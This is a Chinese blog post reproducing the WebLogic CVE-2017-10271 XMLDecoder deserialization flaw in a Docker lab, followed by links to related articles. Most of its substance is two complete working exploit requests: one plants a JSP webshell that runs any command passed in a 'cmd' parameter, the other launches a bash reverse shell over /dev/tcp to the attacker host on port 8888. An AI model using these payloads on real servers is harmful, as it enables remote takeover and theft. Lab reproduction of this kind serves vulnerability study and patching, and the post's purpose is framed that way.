WeblogicCVE-2017-10271 xml反序列化

最新推荐文章于 2024-04-13 13:34:57 发布
最新推荐文章于 2024-04-13 13:34:57 发布
阅读量215 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: weblogic 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/117333457
版权
本文详细介绍了CVE-2017-10271漏洞如何通过WebLogic的XMLDecoder解析漏洞进行攻击,包括环境搭建、POC利用、shell反弹过程。重点讲解了如何利用burp进行payload构造和接收反弹的shell实例。
摘要由CSDN通过智能技术生成

Weblogic CVE-2017-10271 xml反序列化


漏洞成因

CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

参考文章:传送门

理解java反序列化漏洞:传送门

实验环境

主机角色IP
centos8漏洞靶机192.168.1.80
windows10攻击机(burp)192.168.1.120

实验流程

开启漏洞环境centos8

service docker start
cd /usr/sbin/vulhub/weblogic/CVE-2017-10271
docker-compose build
docker-compose up -d

尝试访问漏洞页面:

image-20210527145616089

如图所示,环境搭建成功。

写入webshell

poc如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
HOST: 192.168.1.80:7001
Accept-Encoding: gzip,deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 1259

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  <!--定义soap环境内容-->
	<soapenv:Header>
	<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
	<java><java version="1.4.0" class="java.beans.XMLDecoder">  <!--定义java版本和class-->
	<object class="java.io.PrintWriter"> <!--实例化java.io.PrintWriter类为一个对象-->
	<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <!--为对象传入一个string类型的参数-->
	<void method="println"><string>   <!-- 调用java.io.ProintWriter类中的printIn方法 -->
        <!--为println方法传入一个string型的参数,内容为jsp一句话木马 -->
	<![CDATA[                               
<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");
}
%>
	]]>
	</string>
	</void>
	<void method="close"/>
	</object></java></java>
	</work:WorkContext>
	</soapenv:Header>
	<soapenv:Body/>
</soapenv:Envelope>

java.io.PrintWriter使用方法

import java.io.IOException;
import java.io.PrintWriter;

public class PWDemo {
    public static void main(String[] args) throws IOException {
		PrintWrite pw = new PrintWriter("pw.txt");  //实例化一个对象,并传入参数(文件路径)
		pw.println("他日若遂凌云志");  //写入内容
		pw.println("敢笑黄巢不丈夫");  
		System.out.println("写入完毕!");  //输出回显
		pw.close();   //关闭并保存文件
    }
}

利用burp向漏洞靶机发送数据包:

image-20210527150150224

用浏览器访问漏洞页面,并传入参数:

image-20210527150257388

反弹shell

poc如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">  <!--定义ProcessBuilder类-->
<array class="java.lang.String" length="3">   <!--设置参数为三个string型元素的数组-->
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.1.120/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

//ProcessBuilder使用方法
//此类用于创建操作系统进程,它提供一种启动和管理进程(也就是应用程序)的方法。
ProcessBuilder pb = new ProcessBuilder("myCommand", "myArg1", "myArg2");

在windows本地开启nc端口监听:

image-20210527162529648

用burp发送poc数据包:

image-20210527162503885

收到反弹的shell:

image-20210527162615894

0ak1ey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Weblogic XML反序列化漏洞检查工具CVE-2017-10271
02-22
Weblogic XML反序列化漏洞检查工具CVE-2017-10271,用于网络管理员发现网络中存在的Weblogic XML反序列化漏洞,及时进行修补
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
3. **CVE-2017-10271**:这个特定的漏洞允许攻击者通过恶意构造的XML数据,利用XMLDecoder进行反序列化攻击,可能触发任意代码执行。修复这个漏洞通常需要禁用或限制XMLDecoder的使用,或者确保只有可信的数据源才能...
weblogic XML反序列化
weixin_48776804的博客
05-10 359
weblogic XML反序列化
weblogic-XMLDecoder反序列化
qq_43381463的博客
03-09 193
漏洞复现-CVE-2017-10271
Weblogic系列漏洞之——XML Decoder反序列化漏洞(CVE-2017-10271
Stephen Wolf
12-11 779
一、漏洞描述: CVE-2017-10271漏洞产生的原因是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 影响版本:10.3.6.0,12.1.3.0.0,...
Weblogic 小于10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271
公众号shadow sock7
11-09 1697
之前本来复现过一次的,结果后来数据丢了,只好再来一遍。 没找到在linux下命令行安装的方法,于是直接在windows上安装算了。 10.3.6.0下载:https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_dev.zip?AuthParam=1541742692_e16e12f2c0404fdf4d6ce52a57f...
Weblogic XML反序列化Cve-2017-10271V1.0.jar
04-16
weblogic反序列工具
weblogicScan+cve-2017-10271.rar
06-27
在提供的压缩包中,`Weblogic XML反序列化漏洞检查工具CVE-2017-10271.exe`可能是用于检测或演示该漏洞利用的程序。通过运行这个工具,管理员可以在自己的环境中模拟攻击,确认是否存在漏洞,或者在修复后验证漏洞...
C# xml序列化和反序列化
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
XML序列化与反序列化 实战
08-16
XML序列化与反序列化是.NET框架中处理数据交换的重要技术,它允许我们将对象的状态转换为XML格式的数据,也可以将XML数据恢复为等效的对象。这个实战项目专注于使用C#实现这一过程,使得开发者能够方便地在XML文件和...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
XML序列化/反序列化
03-26
XML序列化/反序列化类,放到项目中直接使用,很方便。 SerializationHelper
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271
huangyongkang666的博客
07-25 1269
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271
weblogic反序列化XMLDecoder
遇事不决冲冲冲
05-18 1974
基于XMLweblogic反序列化漏洞 紧跟上文,这篇来分析一下基于XMLweblogic反序列化漏洞,这里xml本身就是序列化对象,通过XMLDecoder进行反序列化解析(循环遍历XML数据并进行拼接处理),最终拼接出完整的恶意语句并执行,列出CVECVE-2017-3506、CVE-2017-10271CVE-2019-2729、CVE-2019-2725,漏洞复现,断点分析,修复
WebLogic-XMLDecoder(CVE-2017-10271)反序列化漏洞分析及复现
最新发布
人若无名,便可专心练剑
04-13 1598
下面的内容主要是给师傅们介绍和讲解下weblogic XMLDecoder漏洞,这个漏洞有很多个版本,有多个cve漏洞,这里我主要从基于IDEA和vulhun环境搭建来给师傅们复现下这个weblogic XMLDecoder漏洞。复现完成的师傅们,要是基础还可以,学过Java代码的可以尝试掌握下这个漏洞的POC构造,这个是底层代码原理,比较难,小白的话把漏洞原理以及漏洞复现完成即可!!!
weblogic反序列化
m0_67284865的博客
07-02 426
weblogic的两种反序列化xml和wls
Weblogic XMLDecoder 反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
05-20 2523
本文介绍了Weblogic XMLDecoder反序列化相关的漏洞原理和poc的构造,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,本文对此进行了简要介绍。
weblogic反序列化介绍及环境搭建
遇事不决冲冲冲
05-08 3728
weblogic是一个常用的web中间件,它的反序列化漏洞也算是比较经典,而在weblogic里面其实反序列化漏洞大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML反序列化漏洞,一个原因就是配置环境配了好长时间,这篇就当作专门介绍环境搭建了吧Cve-2017-3506Cve-2017-10271Cve-2019-2729Cve-2019-2725CVE-2015-4852CVE-2016-0638CVE-2016-3510CVE-2017-3248CVE-2018-2628 CVE-20
Xml 文件序列化 反序列化
03-13
XML文件序列化和反序列化是将对象数据转换为XML格式的字符串,以及将XML格式的字符串还原为对象数据的过程。 在C#中,可以使用XmlSerializer类来实现XML文件的序列化和反序列化。以下是实现方式: 1. XML文件序列...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值